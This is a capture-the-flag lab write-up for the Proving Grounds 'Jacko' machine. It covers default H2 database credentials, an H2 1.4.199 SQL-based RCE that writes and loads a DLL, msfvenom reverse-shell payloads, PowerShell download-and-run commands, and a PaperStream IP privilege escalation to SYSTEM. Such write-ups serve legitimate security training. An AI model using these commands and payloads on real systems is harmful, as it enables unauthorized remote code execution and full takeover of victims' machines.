Writeup for Jacko from Offensive Security Proving Grounds (PG)

Information Gathering

Service Enumeration -H -t full -H -t vulns


Null sessions not allowed


Port 80:
Port 8082:
The default credentials sa: worked. Here we can run SQL queries.
SHOW DATABASES shows us that there is a PUBLIC schema.
However, further enumeration found nothing much interesting in the database.
We see the version of the product (H2 1.4.199). This version suffers from an RCE vulnerability.
If we execute the following SQL statements:
-- Write native library
SELECT CSVWRITE('C:\Windows\Temp\JNIScriptEngine.dll', CONCAT('SELECT NULL "', CHAR(0x4d),CHAR(0x5a),CHAR(0x90), ... ,CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),'"'), 'ISO-8859-1', '', '', '', '', '');
-- Load native library
CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load";
CALL System_load('C:\Windows\Temp\JNIScriptEngine.dll');
-- Evaluate script
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\Z").next()');
we can achieve RCE.
With this, we can run the systeminfo command. This shows us that the architecture is x64.
msfvenom -p windows/x64/shell/reverse_tcp LHOST= LPORT=445 -f exe > reverse.exe
Note that ports like 4242, 4444, etc. did not work. I used port 445 since I realised that I was able to copy files via SMB, so it likely won't be blocked by the firewall.
Copy the payload to the victim machine via SMB:
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c copy \\\\\\ROPNOP\\reverse.exe c:\\users\\tony\\reverse.exe").getInputStream()).useDelimiter("\\Z").next()');
Running the payload:
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("c:\\users\\tony\\reverse.exe").getInputStream()).useDelimiter("\\Z").next()');
Receiving the reverse shell:

Privilege Escalation


c:\windows\system32\whoami.exe /priv
We see that SeImpersonatePrivilege is enabled.
After we locate the location of powershell.exe, we can run powershell.
Using the GetCLSID.ps1 script from, we can attempt to get CLSIDs.
IEX (New-Object Net.WebClient).DownloadString('')
This does not work because we cannot find any CLSIDs.

Windows OS Exploits

Transfer WinPEAS:
$WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile("","C:\users\tony\winPEASx86.exe")
Run WinPEAS:
We could try these as a last resort.

Vulnerable Apps

Took quite a while to figure this out. Always check for vulnerable apps if WinPEAS does not find anything useful!
We can check the PaperStream IP version, it is 1.42
This version is vulnerable to a privilege escalation vulnerability.
msfvenom -p windows/shell_reverse_tcp -f dll -o shell.dll LHOST= LPORT=445
I initially made the mistake of using an x64 payload. Note that the application is found under Program Files (x86), so it cannot use an x64 DLL.
$WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile("","C:\users\tony\shell.dll")
$WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile("","C:\users\tony\49382.ps1")
Run the exploit: C:\users\tony\49382.ps1
Once the exploit is triggered, we obtain our reverse shell.
The exploit works and we received a SYSTEM shell.
Last modified 1yr ago